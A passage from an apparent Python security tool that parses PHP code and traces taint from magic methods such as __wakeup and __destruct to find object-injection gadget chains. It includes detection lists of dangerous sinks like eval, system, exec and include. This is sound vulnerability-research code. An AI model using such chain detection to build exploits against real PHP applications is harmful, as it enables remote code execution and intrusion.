                    'error': f"Invalid JSON from PHP CLI: {stdout[:120]}"
                }
            
            status = parsed.get('status')
            success = status == 'successed'
            error_msg = parsed.get('reason') or parsed.get('error') or (result.stderr.strip() if result.stderr else None)
            
            return {
                'filepath': filepath,
                'ast': parsed.get('ast'),
                'success': success,
                'error': error_msg
            }
    
        def _init_cli_parser(self) -> Optional[Dict[str, Any]]:
            php_binary = shutil.which('php')
            script_path = Path(__file__).resolve().parent / 'scripts' / 'php_ast_cli.php'
            
            if not php_binary or not script_path.exists():
                return None
            
            if not self._php_has_ast_extension(php_binary):
                return None
            
            supported_versions = self._get_supported_ast_versions(php_binary)
            preferred_version = supported_versions[-1] if supported_versions else 90
            
            return {
                'binary': php_binary,
                'script': str(script_path),
                'version': preferred_version
            }
    
        def _php_has_ast_extension(self, php_binary: str) -> bool:
            try:
                result = subprocess.run(
                    [php_binary, '-r', 'echo extension_loaded("ast") ? "1" : "0";'],
                    capture_output=True,
                    text=True,
                    check=True
                )
                return result.stdout.strip() == '1'
            except Exception:
                return False
    
        def _get_supported_ast_versions(self, php_binary: str) -> List[int]:
            try:
                result = subprocess.run(
                    [php_binary, '-r', 'echo json_encode(ast\\get_supported_versions());'],
                    capture_output=True,
                    text=True,
                    check=True
                )
                data = json.loads(result.stdout.strip() or '[]')
                versions = []
                for value in data or []:
                    try:
                        versions.append(int(value))
                    except (TypeError, ValueError):
                        continue
                return sorted(set(versions))
            except Exception:
                return []
    
    
    class ASTWalker:
        """Walks and analyzes PHP AST"""
        
        def __init__(self):
            self.classes: Dict[str, Dict] = {}
            self.methods: Dict[str, Dict] = {}
            self.calls: List[CallSite] = []
            self.property_accesses: List[PropertyAccess] = []
            self.current_class: Optional[str] = None
            self.current_method: Optional[str] = None
            self.current_file: str = ""
            
        def walk(self, ast_data: Dict):
            """Walk through AST and extract information"""
            if not ast_data.get('success'):
                return
            
            self.current_file = ast_data.get('filepath', '')
            ast = ast_data.get('ast')
            
            if ast:
                self._traverse_iterative(ast)
        
        def _traverse_iterative(self, root: Dict):
            """Iteratively traverse AST nodes using a stack to avoid recursion depth issues"""
            if not isinstance(root, dict):
                return
            
            # Stack contains tuples of (node, parent_context)
            stack = [(root, None)]
            
            while stack:
                node, parent_context = stack.pop()
                
                if not isinstance(node, dict):
                    continue
                
                kind = node.get('kind')
                line = node.get('lineno', 0)
                
                # Process node based on kind
                try:
                    if kind == 'AST_CLASS':
                        self._process_class(node)
                    elif kind == 'AST_METHOD':
                        self._process_method(node, parent_context)
                    elif kind == 'AST_CALL':
                        self._process_call(node, line)
                    elif kind == 'AST_METHOD_CALL':
                        self._process_method_call(node, line)
                    elif kind == 'AST_STATIC_CALL':
                        self._process_static_call(node, line)
                    elif kind == 'AST_NEW':
                        self._process_new(node, line)
                    elif kind == 'AST_PROP':
                        self._process_property_access(node, line)
                except Exception as e:
                    # Continue processing even if one node fails
                    pass
                
                # Add children to stack
                new_context = {'parent_kind': kind, 'parent_line': line}
                children = node.get('children')
                
                if isinstance(children, dict):
                    for key, child in children.items():
                        if isinstance(child, dict):
                            stack.append((child, new_context))
                        elif isinstance(child, list):
                            for item in child:
                                if isinstance(item, dict):
                                    stack.append((item, new_context))
                elif isinstance(children, list):
                    for child in children:
                        if isinstance(child, dict):
                            stack.append((child, new_context))
        
        def _process_class(self, node: Dict):
            """Process class declaration"""
            children = node.get('children', {})
            name_node = children.get('name')
            extends_node = children.get('extends')
            implements_node = children.get('implements')
            
            class_name = self._get_name(name_node)
            parent_name = self._get_name(extends_node) if extends_node else None
            implements = self._extract_name_list(implements_node) if implements_node else []
            
            if class_name:
                old_class = self.current_class
                self.current_class = class_name
                
                self.classes[class_name] = {
                    'name': class_name,
                    'parent': parent_name,
                    'interfaces': implements,
                    'methods': {},
                    'properties': [],
                    'filepath': self.current_file,
                    'line': node.get('lineno', 0)
                }
                
                # Process class body using iterative approach
                stmts = children.get('stmts')
                if stmts:
                    self._process_stmts_iterative(stmts)
                
                self.current_class = old_class
        
        def _process_stmts_iterative(self, stmts_node: Dict):
            """Process statements iteratively"""
            if not isinstance(stmts_node, dict):
                return
            
            stack = [stmts_node]
            
            while stack:
                node = stack.pop()
                
                if not isinstance(node, dict):
                    continue
                
                kind = node.get('kind')
                line = node.get('lineno', 0)
                
                # Process specific node types
                try:
                    if kind == 'AST_METHOD':
                        self._process_method(node, None)
                    elif kind == 'AST_PROP_DECL':
                        self._process_property_decl(node)
                except Exception:
                    pass
                
                # Add children to stack
                children = node.get('children')
                if isinstance(children, dict):
                    for child in children.values():
                        if isinstance(child, (dict, list)):
                            stack.append(child)
                elif isinstance(children, list):
                    for child in children:
                        if isinstance(child, dict):
                            stack.append(child)
        
        def _process_property_decl(self, node: Dict):
            """Process property declaration"""
            if not self.current_class:
                return
            
            children = node.get('children', {})
            
            # Handle property declarations
            if isinstance(children, list):
                for prop in children:
                    if isinstance(prop, dict):
                        prop_children = prop.get('children', {})
                        name_node = prop_children.get('name')
                        prop_name = self._get_name(name_node)
                        if prop_name:
                            self.classes[self.current_class]['properties'].append(prop_name)
        
        def _process_method(self, node: Dict, parent_context: Dict = None):
            """Process method declaration"""
            children = node.get('children', {})
            name_node = children.get('name')
            
            method_name = self._get_name(name_node)
            
            if method_name and self.current_class:
                old_method = self.current_method
                self.current_method = method_name
                method_key = f"{self.current_class}::{method_name}"
                
                method_data = {
                    'class': self.current_class,
                    'name': method_name,
                    'is_magic': method_name.startswith('__') and not method_name.endswith('construct'),
                    'line': node.get('lineno', 0),
                    'filepath': self.current_file,
                    'params': self._extract_params(children.get('params')),
                    'calls': [],
                    'property_accesses': [],
                    'variables': set()
                }
                
                self.methods[method_key] = method_data
                
                if self.current_class in self.classes:
                    self.classes[self.current_class]['methods'][method_name] = method_data
                
                # Process method body iteratively
                stmts = children.get('stmts')
                if stmts:
                    self._process_method_body_iterative(stmts, method_key)
                
                self.current_method = old_method
        
        def _process_method_body_iterative(self, stmts_node: Dict, method_key: str):
            """Process method body iteratively to avoid deep recursion"""
            if not isinstance(stmts_node, dict):
                return
            
            stack = [stmts_node]
            processed = set()
            
            while stack:
                node = stack.pop()
                
                if not isinstance(node, dict):
                    continue
                
                # Avoid processing the same node multiple times
                node_id = id(node)
                if node_id in processed:
                    continue
                processed.add(node_id)
                
                kind = node.get('kind')
                line = node.get('lineno', 0)
                
                # Process specific node types
                try:
                    if kind == 'AST_CALL':
                        self._process_call(node, line)
                    elif kind == 'AST_METHOD_CALL':
                        self._process_method_call(node, line)
                    elif kind == 'AST_STATIC_CALL':
                        self._process_static_call(node, line)
                    elif kind == 'AST_NEW':
                        self._process_new(node, line)
                    elif kind == 'AST_PROP':
                        self._process_property_access(node, line)
                    
                    # Check for implicit __toString triggers
                    if kind in ('AST_BINARY_OP', 'AST_ASSIGN_OP', 'AST_ECHO', 'AST_PRINT', 'AST_CAST'):
                        self._process_tostring_trigger(node, line)
                except Exception:
                    # Continue even if processing fails
                    pass
                
                # Add children to stack (limit depth)
                children = node.get('children')
                if isinstance(children, dict):
                    for child in children.values():
                        if isinstance(child, dict):
                            stack.append(child)
                        elif isinstance(child, list):
                            for item in child:
                                if isinstance(item, dict):
                                    stack.append(item)
                elif isinstance(children, list):
                    for child in children:
                        if isinstance(child, dict):
                            stack.append(child)
        
        def _process_call(self, node: Dict, line: int):
            """Process function call"""
            children = node.get('children', {})
            expr = children.get('expr')
            
            func_name = self._get_name(expr)
            variable_call = False
            
            if not func_name:
                func_name = self._get_var_name(expr)
                variable_call = bool(func_name)
                
                # Handle $this->prop() or $obj->prop() style dynamic calls
                if not func_name and isinstance(expr, dict) and expr.get('kind') == 'AST_PROP':
                    prop_children = expr.get('children', {})
                    prop_name = self._get_name(prop_children.get('prop'))
                    var_expr = prop_children.get('expr')
                    var_name = self._get_var_name(var_expr)
                    
                    if prop_name:
                        prefix = "$this->" if var_name == 'this' else (f"${var_name}->" if var_name else "$?->")
                        func_name = f"{prefix}{prop_name}"
                        variable_call = True
            
            if func_name and self.current_class and self.current_method:
                call_site = CallSite(
                    caller_class=self.current_class,
                    caller_method=self.current_method,
                    callee_class=None,
                    callee_method=func_name,
                    call_type='function',
                    line=line
                )
                self.calls.append(call_site)
                
                method_key = f"{self.current_class}::{self.current_method}"
                if method_key in self.methods:
                    self.methods[method_key]['calls'].append({
                        'type': 'function',
                        'name': func_name,
                        'line': line,
                        'variable_call': variable_call
                    })
        
        def _process_method_call(self, node: Dict, line: int):
            """Process method call: $obj->method()"""
            children = node.get('children', {})
            expr = children.get('expr')  # The object
            method_node = children.get('method')
            
            method_name = self._get_name(method_node)
            var_name = self._get_var_name(expr)
            
            if method_name and self.current_class and self.current_method:
                # Determine target class if possible
                target_class = None
                if var_name == 'this':
                    target_class = self.current_class
                
                call_site = CallSite(
                    caller_class=self.current_class,
                    caller_method=self.current_method,
                    callee_class=target_class,
                    callee_method=method_name,
                    call_type='method',
                    line=line,
                    variable=var_name
                )
                self.calls.append(call_site)
                
                method_key = f"{self.current_class}::{self.current_method}"
                if method_key in self.methods:
                    self.methods[method_key]['calls'].append({
                        'type': 'method',
                        'name': method_name,
                        'variable': var_name,
                        'target_class': target_class,
                        'line': line
                    })
        
        def _process_static_call(self, node: Dict, line: int):
            """Process static call: Class::method()"""
            children = node.get('children', {})
            class_node = children.get('class')
            method_node = children.get('method')
            
            class_name = self._get_name(class_node)
            class_name = self._normalize_class_reference(class_name)
            method_name = self._get_name(method_node)
            
            if class_name and method_name and self.current_class and self.current_method:
                call_site = CallSite(
                    caller_class=self.current_class,
                    caller_method=self.current_method,
                    callee_class=class_name,
                    callee_method=method_name,
                    call_type='static',
                    line=line
                )
                self.calls.append(call_site)
                
                method_key = f"{self.current_class}::{self.current_method}"
                if method_key in self.methods:
                    self.methods[method_key]['calls'].append({
                        'type': 'static',
                        'name': method_name,
                        'class': class_name,
                        'line': line
                    })
    
        def _process_new(self, node: Dict, line: int):
            """Process object instantiation"""
            children = node.get('children', {})
            class_node = children.get('class')
            
            # Check if it's a dynamic instantiation: new $var()
            class_name = self._get_name(class_node)
            variable_new = False
            
            if not class_name:
                class_name = self._get_var_name(class_node)
                variable_new = bool(class_name)
            
            if variable_new and self.current_class and self.current_method:
                 method_key = f"{self.current_class}::{self.current_method}"
                 if method_key in self.methods:
                    self.methods[method_key]['calls'].append({
                        'type': 'new',
                        'name': class_name,
                        'line': line,
                        'variable_call': True
                    })
        
        def _process_property_access(self, node: Dict, line: int):
            """Process property access: $obj->prop"""
            children = node.get('children', {})
            expr = children.get('expr')
            prop_node = children.get('prop')
            
            var_name = self._get_var_name(expr)
            prop_name = self._get_name(prop_node)
            
            if prop_name and self.current_class and self.current_method:
                access = PropertyAccess(
                    class_name=self.current_class,
                    method_name=self.current_method,
                    property_name=prop_name,
                    access_type='read',
                    line=line
                )
                self.property_accesses.append(access)
                
                method_key = f"{self.current_class}::{self.current_method}"
                if method_key in self.methods:
                    self.methods[method_key]['property_accesses'].append({
                        'name': prop_name,
                        'variable': var_name,
                        'line': line
                    })
        
        def _process_tostring_trigger(self, node: Dict, line: int):
            """Handle implicit __toString triggers like echo, print, concat"""
            kind = node.get('kind')
            children = node.get('children', {})
            flags = node.get('flags', 0)
            
            candidates = []
            
            if kind == 'AST_BINARY_OP' and flags == 8: # BINARY_CONCAT
                candidates.append(children.get('left'))
                candidates.append(children.get('right'))
            elif kind == 'AST_ASSIGN_OP' and flags == 264: # ASSIGN_CONCAT
                candidates.append(children.get('var'))
                candidates.append(children.get('expr'))
            elif kind == 'AST_ECHO':
                 if isinstance(children, dict):
                     candidates.append(children)
                 elif isinstance(children, list):
                     candidates.extend(children)
            elif kind == 'AST_PRINT':
                 candidates.append(children.get('expr'))
            elif kind == 'AST_CAST' and flags == 2: # TYPE_STRING
                 candidates.append(children.get('expr'))
                 
            for candidate in candidates:
                if not isinstance(candidate, dict):
                    continue
                    
                var_name = self._get_var_name(candidate)
                target_class = None
                if var_name == 'this':
                    target_class = self.current_class
                
                # Identify property access if possible for better reporting
                prop_name = None
                if candidate.get('kind') == 'AST_PROP':
                    prop_children = candidate.get('children', {})
                    name_node = prop_children.get('prop')
                    prop_name = self._get_name(name_node)
                    
                if self.current_class and self.current_method:
                    call_site = CallSite(
                        caller_class=self.current_class,
                        caller_method=self.current_method,
                        callee_class=target_class,
                        callee_method='__toString',
                        call_type='method',
                        line=line,
                        variable=var_name
                    )
                    self.calls.append(call_site)
                    
                    method_key = f"{self.current_class}::{self.current_method}"
                    if method_key in self.methods:
                        entry = {
                            'type': 'method',
                            'name': '__toString',
                            'variable': var_name,
                            'target_class': target_class,
                            'line': line,
                            'implicit': True
                        }
                        self.methods[method_key]['calls'].append(entry)
    
        def _extract_params(self, params_node: Dict) -> List[str]:
            """Extract parameter names from AST_PARAM_LIST"""
            if not params_node:
                return []
            
            params = []
            children = params_node.get('children')
            
            if isinstance(children, list):
                for param in children:
                    if isinstance(param, dict):
                        name_node = param.get('children', {}).get('name')
                        param_name = self._get_name(name_node)
                        if param_name:
                            params.append(param_name)
            
            return params
        
        def _get_name(self, node: Any) -> Optional[str]:
            """Extract name from various node types - with recursion protection"""
            if node is None:
                return None
            
            if isinstance(node, str):
                return node
            
            if not isinstance(node, dict):
                return None
            
            # Avoid infinite recursion
            max_depth = 5
            depth = 0
            current = node
            
            while depth < max_depth:
                if not isinstance(current, dict):
                    break
                
                kind = current.get('kind')
                children = current.get('children', {})
                
                if kind == 'AST_VAR':
                    return None
                
                if kind == 'AST_NAME':
                    return children.get('name')
                elif 'name' in children:
                    name_val = children.get('name')
                    if isinstance(name_val, str):
                        return name_val
                    elif isinstance(name_val, dict):
                        current = name_val
                        depth += 1
                    else:
                        return None
                else:
                    return None
            
            return None
        
        def _get_var_name(self, node: Any) -> Optional[str]:
            """Extract variable name from VAR node - with recursion protection"""
            if not isinstance(node, dict):
                return None
            
            kind = node.get('kind')
            children = node.get('children', {})
            
            if kind == 'AST_VAR':
                name_node = children.get('name')
                if isinstance(name_node, str):
                    return name_node
                return self._get_name(name_node)
            
            return None
    
        def _extract_name_list(self, node: Any) -> List[str]:
            """Extract a list of names from AST_NAME_LIST or similar structures"""
            names: List[str] = []
            
            if node is None:
                return names
            
            if isinstance(node, list):
                for child in node:
                    names.extend(self._extract_name_list(child))
                return names
            
            if isinstance(node, str):
                names.append(node)
                return names
            
            if not isinstance(node, dict):
                return names
            
            kind = node.get('kind')
            children = node.get('children', [])
            
            if kind == 'AST_NAME_LIST' and isinstance(children, list):
                for child in children:
                    name = self._get_name(child)
                    if name:
                        names.append(name)
            else:
                name = self._get_name(node)
                if name:
                    names.append(name)
            
            return names
    
        def _normalize_class_reference(self, class_name: Optional[str]) -> Optional[str]:
            """Normalize class references like self/static/parent to concrete names"""
            if not class_name:
                return None
            
            lowered = class_name.lower()
            
            if lowered in {'self', 'static'}:
                return self.current_class
            
            if lowered == 'parent':
                if self.current_class and self.current_class in self.classes:
                    return self.classes[self.current_class].get('parent')
                return None
            
            return class_name
    
        def resolve_method_in_hierarchy(self, class_name: Optional[str], method_name: str) -> Optional[str]:
            """Resolve a method by searching a class and its ancestors"""
            if not class_name or not method_name:
                return None
            
            visited: Set[str] = set()
            current = class_name
            
            while current and current not in visited:
                visited.add(current)
                method_key = f"{current}::{method_name}"
                if method_key in self.methods:
                    return method_key
                
                class_data = self.classes.get(current)
                current = class_data.get('parent') if class_data else None
            
            return None
    
        def find_method_by_name(self, method_name: str) -> Optional[str]:
            """Find the first method matching the provided name anywhere"""
            if not method_name:
                return None
            
            for method_key in self.methods:
                if method_key.endswith(f"::{method_name}"):
                    return method_key
            
            return None
    
        def get_class_lineage(self, class_name: Optional[str]) -> List[str]:
            """Return ordered list of class and its ancestors"""
            lineage: List[str] = []
            if not class_name:
                return lineage
            
            visited: Set[str] = set()
            current = class_name
            
            while current and current not in visited:
                lineage.append(current)
                visited.add(current)
                class_data = self.classes.get(current)
                current = class_data.get('parent') if class_data else None
            
            return lineage
    
    
    class AdvancedTaintAnalyzer:
        """Multi-level taint analyzer with object injection detection"""
        
        SINKS = {
            'rce': {'eval', 'system', 'exec', 'passthru', 'shell_exec', 'popen',
                    'proc_open', 'pcntl_exec', 'create_function', '`'},
            'file_ops': {'file_put_contents', 'fopen', 'file_get_contents', 'fwrite',
                         'unlink', 'rmdir', 'rename', 'copy', 'move_uploaded_file', 'fread'},
            'code_inclusion': {'include', 'require', 'include_once', 'require_once'},
            'reflection': {'call_user_func', 'call_user_func_array', 'call_user_method',
                          'forward_static_call', 'ReflectionFunction', 'ReflectionMethod'},
            'sql': {'mysql_query', 'mysqli_query', 'pg_query', 'sqlite_query', 'query'},
            'command': {'shell_exec', 'proc_open', 'popen', 'passthru'}
        }
        
        MAGIC_METHODS = {
            '__destruct', '__call', '__callStatic', '__get',
            '__set', '__isset', '__unset', '__sleep', '__wakeup', '__toString',
            '__invoke', '__set_state', '__clone', '__debugInfo', '__serialize',
            '__unserialize', 'offsetGet'
        }
        
        # Lower-case names of PHP functions considered harmless.
        # `_identify_sinks` records every direct (non-variable) function call whose
        # lower-cased name is neither in this set nor in a SINKS category as a
        # LOW-severity "Suspicious Function" sink.
        # Only the File/Path group is active. Every other group below is commented
        # out, so calls to those functions ARE currently reported as suspicious.
        SAFE_PHP_FUNCTIONS = {
            # Strings
            # 'strlen', 'strpos', 'strrpos', 'substr', 'str_replace', 'str_repeat', 
            # 'strtoupper', 'strtolower', 'trim', 'rtrim', 'ltrim', 'implode', 'explode', 
            # 'sprintf', 'vsprintf', 'addslashes', 'stripslashes', 'htmlspecialchars', 
            # 'htmlentities', 'urlencode', 'urldecode', 'base64_encode', 'base64_decode', 
            # 'json_encode', 'json_decode', 'serialize', 'unserialize', 'nl2br', 'chop',
            # 'chr', 'ord', 'str_split', 'str_word_count', 'strcmp', 'strcasecmp',
            # 'ucfirst', 'ucwords', 'md5', 'sha1', 'hash', 'crc32', 'lcfirst', 'number_format',
            # 'str_pad', 'str_shuffle', 'strrev', 'strstr', 'strtok', 'wordwrap',
            
            # Arrays
            # 'count', 'sizeof', 'array_key_exists', 'array_keys', 'array_values', 
            # 'array_map', 'array_filter', 'array_merge', 'array_pop', 'array_push', 
            # 'array_shift', 'array_unshift', 'array_slice', 'array_splice', 'in_array', 
            # 'compact', 'extract', 'range', 'sort', 'rsort', 'asort', 'arsort', 
            # 'ksort', 'krsort', 'usort', 'uasort', 'uksort', 'shuffle', 'array_flip',
            # 'array_reverse', 'array_search', 'array_sum', 'array_unique', 'array_combine',
            # 'array_chunk', 'array_column', 'array_count_values', 'array_diff',
            # 'array_diff_assoc', 'array_diff_key', 'array_fill', 'array_fill_keys',
            # 'array_intersect', 'array_intersect_assoc', 'array_intersect_key',
            # 'array_multisort', 'array_pad', 'array_product', 'array_rand',
            # 'array_replace', 'array_replace_recursive', 'array_walk', 'array_walk_recursive',
            # 'current', 'each', 'end', 'key', 'list', 'next', 'pos', 'prev', 'reset',
            
            # Types/Validation
            # 'is_array', 'is_bool', 'is_callable', 'is_double', 'is_float', 'is_int',
            # 'is_integer', 'is_long', 'is_null', 'is_numeric', 'is_object', 'is_real',
            # 'is_resource', 'is_scalar', 'is_string', 'isset', 'empty', 'defined',
            # 'intval', 'floatval', 'strval', 'boolval', 'gettype', 'settype',
            # 'is_countable', 'is_iterable',
            
            # Objects/Classes
            # 'function_exists', 'class_exists', 'method_exists', 'property_exists',
            # 'is_a', 'is_subclass_of', 'get_class', 'get_called_class', 'get_parent_class',
            # 'get_object_vars', 'get_class_methods', 'get_class_vars', 'trait_exists',
            # 'interface_exists',
            
            # Date/Time
            # 'date', 'time', 'strtotime', 'microtime', 'mktime', 'gmdate', 'idate',
            # 'checkdate', 'date_create', 'date_format', 'date_diff', 'date_add',
            # 'date_sub', 'date_interval_create_from_date_string', 'getdate',
            
            # File/Path (Non-destructive/Non-reading content)
            'dirname', 'basename', 'pathinfo', 'file_exists', 'is_dir', 'is_file',
            'is_readable', 'is_writable', 'is_executable', 'is_link', 'stat',
            'filesize', 'filemtime', 'filectime', 'fileatime', 'glob', 'disk_free_space',
            'disk_total_space', 'getcwd', 'realpath',
            
            # Math
            # 'abs', 'ceil', 'floor', 'round', 'max', 'min', 'rand', 'mt_rand',
            # 'sqrt', 'pow', 'exp', 'log', 'sin', 'cos', 'tan', 'pi', 'bindec',
            # 'decbin', 'dechex', 'hexdec', 'octdec', 'decoct', 'fmod', 'hypot',
            # 'is_finite', 'is_infinite', 'is_nan', 'lcg_value',
            
            # Output/Control
            # 'header', 'setcookie', 'die', 'exit', 'define', 'constant', 
            # 'error_log', 'trigger_error', 'debug_backtrace', 'print_r', 'var_dump',
            # 'var_export', 'printf', 'vprintf', 'sleep', 'usleep',
            
            # Regex
            # 'preg_match', 'preg_match_all', 'preg_replace', 'preg_split', 'preg_quote',
            # 'preg_grep', 'preg_replace_callback',
            
            # Misc
            # 'version_compare', 'extension_loaded', 'phpversion', 'ini_get', 'getenv',
            # 'putenv', 'set_time_limit', 'ignore_user_abort', 'uniqid',
            # 'get_defined_constants', 'get_defined_functions', 'get_defined_vars',
            # 'get_included_files', 'get_required_files', 'memory_get_usage',
            # 'memory_get_peak_usage', 'register_shutdown_function'
        }
    
        # Method names treated as chain entry points. Methods with one of these
        # names are seeded with taint confidence 0.95 (other magic methods get 0.7),
        # a class counts as injectable only if one of them resolves somewhere in
        # its hierarchy, and chains starting at one get a confidence boost.
        ENTRY_POINTS = {'__wakeup', '__destruct', '__toString', '__unserialize', 'offsetGet'}
        
        def __init__(self, walker: ASTWalker):
            """Bind the analyzer to *walker* and create empty analysis state.

            Args:
                walker: AST walker whose collected classes, methods and calls
                    are read by the analysis passes of this class.
            """
            self.walker = walker

            # Filled by the source / sink discovery passes.
            self.taint_sources: List[TaintSource] = []
            self.taint_sinks: List[TaintSink] = []

            # class name -> names of properties considered tainted
            self.tainted_properties: Dict[str, Set[str]] = defaultdict(set)
            # method key -> taint confidence
            self.tainted_methods: Dict[str, float] = {}
            # caller key -> call sites made from that method
            self.call_graph: Dict[str, List[CallSite]] = defaultdict(list)

            # Lower-cased copy of SINKS so sink lookups can ignore case.
            lowered_sinks = {}
            for category, functions in self.SINKS.items():
                lowered_sinks[category] = {name.lower() for name in functions}
            self.sinks_normalized = lowered_sinks
            # NOTE: dynamic calls such as `$k($v)` are not part of this table;
            # `_identify_sinks` recognises them through the 'variable_call'
            # marker on each call record.
            
        def analyze(self, stream_output: bool = True) -> List[GadgetChain]:
            """Run the six analysis stages in order and return the detected chains.

            Args:
                stream_output: When true, print the opening/closing banners and
                    pass the flag on to the chain detector so it prints each
                    chain as it is found. The numbered per-stage progress lines
                    are printed regardless of this flag.

            Returns:
                The gadget chains produced by the final detection stage.
            """
            heavy_rule = "=" * 100
            light_rule = "-" * 100

            if stream_output:
                print("\n" + heavy_rule)
                print(" 🔍 LIVE GADGET CHAIN DETECTION")
                print(heavy_rule + "\n")

            # Stage 1: seed taint from magic methods / entry points.
            print("  [1/6] Identifying taint sources...")
            self._identify_taint_sources()
            source_count = len(self.taint_sources)
            print(f"        ✓ Found {source_count} taint sources")

            # Stage 2: collect dangerous calls.
            print("  [2/6] Identifying dangerous sinks...")
            self._identify_sinks()
            sink_count = len(self.taint_sinks)
            print(f"        ✓ Found {sink_count} dangerous sinks")

            # Stage 3: index call sites by caller.
            print("  [3/6] Building call graph...")
            self._build_call_graph()
            node_count = len(self.call_graph)
            print(f"        ✓ Built call graph with {node_count} nodes")

            # Stage 4: spread taint along the call graph (prints its own summary).
            print("  [4/6] Propagating taint (multi-level)...")
            self._propagate_taint_multi_level()

            # Stage 5: find classes that expose an entry point.
            print("  [5/6] Analyzing object injection points...")
            injectable = self._analyze_injectable_objects()
            print(f"        ✓ Found {len(injectable)} injectable classes")

            # Stage 6: connect entry points to sinks.
            print("  [6/6] Detecting exploitable gadget chains...")
            if stream_output:
                print("\n" + light_rule)
                print(" 🎯 DETECTED CHAINS (streaming results)")
                print(light_rule + "\n")

            chains = self._detect_gadget_chains_streaming(injectable, stream_output)

            if stream_output:
                print("\n" + heavy_rule)
                print(f" ✅ ANALYSIS COMPLETE: {len(chains)} total chains detected")
                print(heavy_rule + "\n")

            return chains
        
        def _identify_taint_sources(self):
            """Seed the taint state from magic methods and entry points.

            For every walker method that is flagged ``is_magic`` or whose name is
            in ``ENTRY_POINTS``:

            * each property it accesses is added to ``tainted_properties`` for
              the method's class and recorded as a ``TaintSource``;
            * the method itself is stored in ``tainted_methods``.

            The confidence is 0.95 for ``ENTRY_POINTS`` names and 0.7 otherwise.
            """
            entry_names = self.ENTRY_POINTS

            for method_key, method_data in self.walker.methods.items():
                method_name = method_data['name']
                relevant = method_data['is_magic'] or method_name in entry_names
                if not relevant:
                    continue

                owner = method_data['class']
                if method_name in entry_names:
                    confidence = 0.95
                else:
                    confidence = 0.7

                # Every property touched here is assumed to carry tainted data.
                for access in method_data.get('property_accesses', []):
                    prop_name = access['name']
                    self.tainted_properties[owner].add(prop_name)
                    self.taint_sources.append(TaintSource(
                        name=f"Property in {method_name}",
                        class_name=owner,
                        method_name=method_name,
                        variable=f"$this->{prop_name}",
                        location=method_key,
                        source_type='property',
                        confidence=confidence
                    ))

                # The method is a taint origin even if it touches no property.
                self.tainted_methods[method_key] = confidence
        
        def _identify_sinks(self):
            """Scan every recorded call and register the dangerous ones as sinks.

            Four kinds of sink are appended to ``self.taint_sinks``:

            * ``"<category> sink"`` - a function call whose lower-cased name is
              listed in a ``sinks_normalized`` category (one sink per matching
              category, severity taken from ``_get_severity``).
            * ``"Suspicious Function"`` (LOW) - a direct function call that is
              neither a known sink nor listed in ``SAFE_PHP_FUNCTIONS``.
            * ``"Dynamic Variable Call"`` (CRITICAL) - a function call flagged
              ``variable_call``.
            * ``"Dynamic Instantiation"`` (CRITICAL) - a ``new`` expression
              flagged ``variable_call``.

            Calls of any other type, and function calls without a name, are
            ignored.
            """
            def record(method_key, method_data, call_info, name, function, severity):
                # Single place that builds a sink so all kinds share one shape.
                self.taint_sinks.append(TaintSink(
                    name=name,
                    class_name=method_data['class'],
                    method_name=method_data['name'],
                    filepath=method_data.get('filepath', ''),
                    location=method_key,
                    function=function,
                    severity=severity,
                    line=call_info.get('line', 0)
                ))

            for method_key, method_data in self.walker.methods.items():
                for call_info in method_data.get('calls', []):
                    call_type = call_info.get('type')
                    is_dynamic = bool(call_info.get('variable_call'))

                    if call_type == 'new':
                        # `new` records used to be dropped by a function-only
                        # guard, which made dynamic instantiation undetectable.
                        # A static `new Foo(...)` is not a sink by itself.
                        if is_dynamic:
                            target = call_info.get('name') or ''
                            record(method_key, method_data, call_info,
                                   "Dynamic Instantiation",
                                   f"new ${target}(...)",
                                   TaintLevel.CRITICAL)
                        continue

                    if call_type != 'function':
                        continue

                    func_name = (call_info.get('name') or '').strip()
                    if not func_name:
                        continue
                    func_name_lower = func_name.lower()

                    # Known dangerous functions: one sink per matching category.
                    matched = [
                        category
                        for category, functions in self.sinks_normalized.items()
                        if func_name_lower in functions
                    ]
                    for category in matched:
                        record(method_key, method_data, call_info,
                               f"{category} sink", func_name,
                               self._get_severity(category))

                    if is_dynamic:
                        # `$f(...)`: the callee is chosen at runtime.
                        record(method_key, method_data, call_info,
                               "Dynamic Variable Call",
                               f"${call_info.get('name')}(...)",
                               TaintLevel.CRITICAL)
                    elif not matched and func_name_lower not in self.SAFE_PHP_FUNCTIONS:
                        # Unknown direct call: neither a listed sink nor known safe.
                        record(method_key, method_data, call_info,
                               "Suspicious Function", func_name,
                               TaintLevel.LOW)
        
        def _get_severity(self, category: str) -> TaintLevel:
            """Return the severity level assigned to a sink *category*.

            'rce', 'code_inclusion', 'deserialization' and 'command' are
            CRITICAL; 'file_ops', 'reflection' and 'sql' are HIGH; any other
            category is MEDIUM.
            """
            critical_categories = frozenset(
                ('rce', 'code_inclusion', 'deserialization', 'command')
            )
            high_categories = frozenset(('file_ops', 'reflection', 'sql'))

            if category in critical_categories:
                return TaintLevel.CRITICAL
            if category in high_categories:
                return TaintLevel.HIGH
            return TaintLevel.MEDIUM
        
        def _build_call_graph(self):
            """Build comprehensive call graph"""
            for call_site in self.walker.calls:
                caller_key = f"{call_site.caller_class}::{call_site.caller_method}"
                self.call_graph[caller_key].append(call_site)
        
        def _propagate_taint_multi_level(self):
            """Multi-level taint propagation"""
            max_iterations = 10
            iteration = 0
            
            while iteration < max_iterations:
                changed = False
                iteration += 1
                
                for method_key, method_data in self.walker.methods.items():
                    class_name = method_data['class']
                    
                    # If method accesses tainted properties, mark it as tainted
                    for prop_access in method_data.get('property_accesses', []):
                        prop_name = prop_access['name']
                        if prop_name in self.tainted_properties[class_name]:
                            if method_key not in self.tainted_methods:
                                self.tainted_methods[method_key] = 0.8
                                changed = True
                    
                    # Propagate taint through calls
                    if method_key in self.tainted_methods:
                        for call_site in self.call_graph.get(method_key, []):
                            # Find the called method
                            callee_key = None
                            if call_site.callee_class:
                                callee_key = self.walker.resolve_method_in_hierarchy(
                                    call_site.callee_class,
                                    call_site.callee_method
                                )
                            else:
                                # Try to resolve the method
                                callee_key = self._resolve_method(
                                    call_site.callee_method,
                                    call_site.variable,
                                    class_name
                                )
                            
                            if callee_key and callee_key in self.walker.methods:
                                if callee_key not in self.tainted_methods:
                                    # Propagate with reduced confidence
                                    confidence = self.tainted_methods[method_key] * 0.9
                                    self.tainted_methods[callee_key] = confidence
                                    changed = True
                            else:
                                # Try fallback to __call or implicit __invoke
                                fallback_key = None
                                
                                # 1. __call fallback (if method call and not found)
                                if call_site.call_type == 'method' and call_site.callee_class:
                                    fallback_key = self.walker.resolve_method_in_hierarchy(
                                        call_site.callee_class, '__call'
                                    )
                                
                                # 2. __invoke fallback (if variable call)
